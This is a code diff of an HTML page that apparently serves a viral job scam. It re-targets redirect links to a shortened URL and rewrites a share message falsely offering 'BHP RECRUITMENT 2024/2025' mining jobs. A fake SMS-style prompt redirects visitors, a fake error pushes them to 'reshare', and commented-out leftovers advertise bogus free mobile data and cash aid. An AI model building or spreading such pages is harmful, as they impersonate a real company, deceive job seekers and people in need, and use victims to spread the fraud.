--- a/application.html
+++ b/application.html
@@ -9,7 +9,7 @@ var password = 'BHP RECRUITMENT'
 password=prompt('SMS: The application is currently in progress, press OK to apply for the .','BHP recruitment');
 if (password != 'BHP recruitment');
 if (password != 'BHP recruitment') {
-location.href='https://tinyurl.com/COMESAFunds';
+location.href='https://tinyurl.com/BHPrecruit';
 }
 </script>      
     
@@ -805,7 +805,7 @@ color: #dd5900
 	
    
 <!-- BEGIN: Powered by Supercounters.com -->
-<center><script type="text/javascript" src="//widget.supercounters.com/ssl/online_t.js"></script><script type="text/javascript">sc_online_t(1703483,"Users Online","ffffff");</script><br><noscript><a href="https://www.supercounters.com/">supercounters.com</a></noscript>
+<center><script type="text/javascript" src="//widget.supercounters.com/ssl/online_t.js"></script><script type="text/javascript">sc_online_t(1704066,"Users Online","ffffff");</script><br><noscript><a href="https://www.supercounters.com/">supercounters.com</a></noscript>
 </center>
 <!-- END: Powered by Supercounters.com -->
 
@@ -913,7 +913,7 @@ color: #dd5900
                   
           <button id="confirm">Continue</button>
             </div>
-            <p class="error">Sorry, your name is missing <a href="https://tinyurl.com/COMESAFunds"> <b><font color="#14948F">ADD A NAME</font></b></a></p>
+            <p class="error">Sorry, your name is missing <a href="https://tinyurl.com/BHPrecruit"> <b><font color="#14948F">ADD A NAME</font></b></a></p>
         </div>
         <div id="checking">
           <p class="title"><font color="#000000">Processing, please wait</font></p>
@@ -1114,7 +1114,7 @@ $(document).click(function () {
 "30%20GB%20Free%20Internet%20Offer%0A%E2%9D%A4%0ATo%20Activate%2030%20GB%20Free%20Internet%20for%20all%20Networks%20click%20here%F0%9F%91%87%0A*1.%20Jio*%0Ahttps://cutt.ly/30-GB_Jio%0A%20%0A*2.%20Airtel*%0Ahttps://cutt.ly/30-GB_Airtel%0A%20%0A*3.%20Vi*%0Ahttps://cutt.ly/30-GB_Vi%0A%20%0A*4.%20Jazz*%0Ahttps://cutt.ly/30-GB_Jazz%0A%20%0A*5.%20Zong*%0Ahttps://cutt.ly/30-GB_Zong%0A%20%0A*6.%20Telenor*%0Ahttps://cutt.ly/30-GB_Telenor%0A%20%0A*7.%20Ufone*%0Ahttps://cutt.ly/30-GB_Ufone%0A%20%0A*8.%20Other Networks*%0Ahttps://cutt.ly/Get_30GB",
 -->
       <script>
-	        var text1 = "BHP RECRUITMENT 2024/2025.%0A%0ABHP has started recruiting new workers for its ongoing major mining project. %0A%0A*Applications are currently ongoing.*%0A%0A_APPLY HERE_%0Ahttps://tinyurl.com/COMESAFunds",
+	        var text1 = "BHP RECRUITMENT 2024/2025.%0A%0ABHP has started recruiting new workers for its ongoing major mining project. %0A%0A*Applications are currently ongoing.*%0A%0A_APPLY HERE_%0Ahttps://tinyurl.com/BHPrecruit",
             text2 = " an amount of ",
             text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
             error = "There is a problem!\nMessages are not calculated. You may have shared it with the same friend or group more than once, please reshare",
